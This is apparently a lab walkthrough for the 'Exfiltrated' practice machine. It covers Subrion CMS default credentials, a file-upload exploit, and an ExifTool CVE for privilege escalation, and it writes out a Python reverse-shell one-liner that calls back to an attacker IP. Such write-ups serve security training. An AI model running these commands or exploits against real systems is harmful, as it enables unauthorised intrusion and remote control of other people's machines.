search

Exfiltrated

hashtag
Enumeration

80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 09BDDB30D6AE11E854BFF82ED638542B
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 7 disallowed entries 
| /backup/ /cron/? /front/ /install/ /panel/ /tmp/ 
|_/updates/
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://exfiltrated.offsec/

Subrion CMS 4.2.1

Default credentials - admin:admin

Subrion CMS 4.2.1 - Arbitrary File Upload

https://www.exploit-db.com/exploits/49876

hashtag
Initial Access

$ python3 49876 -u http://exfiltrated.offsec/panel/ --user admin --passw admin

Got webshell. Executed this command to reverse shell.

export RHOST="192.168.49.145";export RPORT=80;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")'

hashtag
PrivEsc

ExifTool Version Number : 11.88

exiftool -> CVE-2021-22204-exiftool

https://blog.convisoappsec.com/en/a-case-study-on-cve-2021-22204-exiftool-rce/arrow-up-right

CVE-2021-22204 can be triggered with a perfectly valid image (jpg, tiff, mp4 and many more) leading to arbitrary code execution! Improper neutralization of user data in the DjVu file format in ExifTool versions 7.44(to 12.24+) and up allows arbitrary code execution when parsing the malicious image.

https://github.com/convisolabs/CVE-2021-22204-exiftoolarrow-up-right

Change the IP and Port in the exploit.py file

PreviousClamAVNextHawat

Last updated